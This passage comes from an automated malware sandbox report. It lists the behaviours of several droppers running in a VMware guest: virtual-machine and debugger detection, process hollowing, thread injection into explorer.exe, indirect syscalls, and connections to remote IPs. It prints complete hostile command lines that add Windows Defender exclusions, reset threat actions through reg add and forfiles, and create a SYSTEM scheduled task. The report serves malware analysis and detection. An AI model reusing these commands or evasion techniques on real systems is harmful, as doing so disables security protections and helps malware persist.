Source: svchost.exe, 0000001C.00000003.1311218476.0000017993A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2721253426.000001E0D127F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.2762397674.000001B899B32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?VMware-4288 1!cc 59 1`
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000024.00000000.1419179675.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6000c298128b8c02a71a2474aeb5f3dc\|Virtual disk \|VMware
Source: AddInProcess32.exe, 00000005.00000002.2528201229.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2537509496.00000238A0831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140AAD000.00000080.00000001.01000000.0000000E.sdmp	Binary or memory string: <$hGfSuA_A
Source: svchost.exe, 0000000D.00000003.1410135146.000001B899B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: svchost.exe, 0000000B.00000002.2686253357.000001E0D122B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 0000001C.00000002.2523240829.0000017993A02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000034.00000002.2732590110.000001F4D8694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000024.00000000.1419179675.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: svchost.exe, 00000034.00000002.2705850563.000001F4D862B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 0000000B.00000002.2686253357.000001E0D123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

System information queried: ModuleInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

Code function: 8_2_00403406 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,

8_2_00403406

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

Code function: 18_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_00418320

Contains functionality to read the PEB

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E10D90 mov eax, dword ptr fs:[00000030h]	8_2_02E10D90
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E1092B mov eax, dword ptr fs:[00000030h]	8_2_02E1092B
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03021E8F push dword ptr fs:[00000030h]	8_2_03021E8F

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35755C0 RtlAddVectoredExceptionHandler,	0_2_00007FF7E35755C0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35D9808 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7E35D9808
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0041584A SetUnhandledExceptionFilter,	18_2_0041584A
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0041585C SetUnhandledExceptionFilter,	18_2_0041585C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: FFE8.exe.36.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80
Source: C:\Windows\explorer.exe	Network Connect: 66.85.156.89 80

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

Thread created: C:\Windows\explorer.exe EIP: 89419E0

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140D79DBC
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140737CF6
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtSetInformationThread: Indirect: 0x14074EFD4
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQuerySystemInformation: Indirect: 0x140D20A0E
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140D79F0B
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140737BBA
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtSetInformationThread: Indirect: 0x140D9A2AB
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQuerySystemInformation: Indirect: 0x1406D842B

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 674008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
